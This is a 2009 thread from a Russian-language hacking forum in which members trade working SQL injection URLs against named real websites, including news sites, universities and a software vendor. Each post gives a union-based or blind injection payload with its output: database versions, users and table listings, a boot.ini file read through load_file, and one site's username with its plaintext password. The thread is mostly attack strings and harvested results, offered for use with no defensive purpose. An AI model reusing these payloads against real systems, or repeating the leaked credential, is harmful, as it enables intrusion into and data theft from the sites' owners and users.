HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.05.2009, 22:42
d1aVOL
Познающий
Регистрация: 29.07.2007
Сообщений: 49
Провел на форуме:
279583

Репутация: 7
По умолчанию

http://www.artemismusic.com/page.php?id=-1+union+select+1--
4.1.22-standard-log
artemismusic@192.168.0.7
 
Ответить с цитированием

  #2  
Старый 08.05.2009, 22:54
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.ftlauderdalenews.net {PR 3}
Код:
http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8--
4.1.20-max-log : Promena_news : Promena_pubuser@76.162.254.225

tabla users:
Код:
http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,name,password),5,6,7,8+from+users--
Ray Brasted : 1x2y3z

--------------------------------------------------------------------------------------------------------------------------------

http://www.omnisens.ch {PR 5}
Код:
http://www.omnisens.ch/ditest/doc-news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14/*
4.1.22-log : db1034902 : user10349@web03

--------------------------------------------------------------------------------------------------------------------------------

http://www.nnpn.org {PR 5}
Код:
http://www.nnpn.org/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
4.1.22-max-log : nnpn : nnpn@97.74.144.114

Последний раз редактировалось Skofield; 08.05.2009 в 23:28..
 
Ответить с цитированием

  #3  
Старый 09.05.2009, 00:48
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,4,5,6,7,unhex(hex(concat_ws(0x3a,user(),database(),version()))),9,10,11,12,13,14
root@localhost:site_pages:5.0.15-nt
Код:
http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,load_file(0x433A5C626F6F742E696E69),5,6,7,8,9,10,11,12,13,14
boot.ini
 
Ответить с цитированием

  #4  
Старый 09.05.2009, 10:20
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 4

http://www.wostep.ch/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),databa se(),vers ion()),4,5+ --+&lang=en


web193@localhost:usr_web193_1:5.0.45
 
Ответить с цитированием

  #5  
Старый 09.05.2009, 10:47
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.riff.it/php/show.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52
Sql44172@62.149.130.186:Sql44172_1:4.0.30-standard-log
 
Ответить с цитированием

  #6  
Старый 09.05.2009, 12:46
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Пацаны с праздником,ну что поехали по немцам

http://carnageclan.de/download_info.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13,14/*

v099182@localhost:v099182:4.1.21-max-log


есть форум tam


P.S за этот сайт спс mailbrush'y (3a no/\y4eHue info)
################################################## ##########

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--

web3_bitesser@localhost:web3_bitesser:5.0.26-log 1.1


tables:

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_na me),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36+from+informat ion_schema.tables+group+by+table_schema+limit+1,1--


bit_scri_imp,rel_gs_group_gs_rights,rel_bit_member _bit_scri_imp,bit_tip,rel_tipprechnung_tippposten, rel_bit_news_bit_news_cat,forum_member,bit_job,rel _bit_scri_bit_scri_his,generic_id_tablenames,bit_n ews_sta,rel_bit_tip_bit_tip_cat,gs_rights,gs_user, bit_scri_lan,rel_gs_user_gs_group,rel_bit_member_b it_tip,bit_tip_cat,tippkunde,rel_bit_news

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat (column_name),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+information_schema.columns+where+table _name=0x67735f75736572--

generic_id,id,creation_date,creation_time,modify_d ate,modify_time,active,username,password,name,surn ame

(но что то она пустая)))

Последний раз редактировалось HAXTA4OK; 09.05.2009 в 13:00..
 
Ответить с цитированием

  #7  
Старый 09.05.2009, 12:57
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null
POSTGRESQL 7.1.3 ON SPARC-SUN-SOLARIS2.7, COMPILED BY GCC 2.8.1

Первый раз встречаюсь с PgSQL.
 
Ответить с цитированием

  #8  
Старый 09.05.2009, 14:09
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.carolinainnatvg.com/news_detail.php?n_recid=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9

Database Version: 5.0.45-log
Database name: biztools_carolinainn
User name: biztools_127@localhost

http://www.mytimber.net/news_detail.php?newsid=11+UNION+SELECT+1,2,3,4,5,6 ,7,8,9+LIMIT+1,1

Database Version: 4.0.24-log
Database name: uob0q1_db
User name: uob0q1@localhost

Последний раз редактировалось Rubaka; 09.05.2009 в 14:45..
 
Ответить с цитированием

  #9  
Старый 09.05.2009, 16:15
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

sql - blind
<<Центр дистанцонного обучения>>
Код:
http://www.tsiac.ru/cdo/index.php?id=14+or+ascii(substring(version(),1,1))=52--+
db: 4.......
 
Ответить с цитированием

  #10  
Старый 09.05.2009, 17:09
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

blind-sql:
www.aimp.ru
Код:
http://aimp.ru/index.php?do=view&id=5161+and+ascii(lower(substring(user(),2,1)))=105
user():aimp
Код:
http://aimp.ru/index.php?do=view&id=5161+and+substring(version(),1,1)=4
version():4....пля в 4й версии mysql неподдержуются подзапросы((((
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ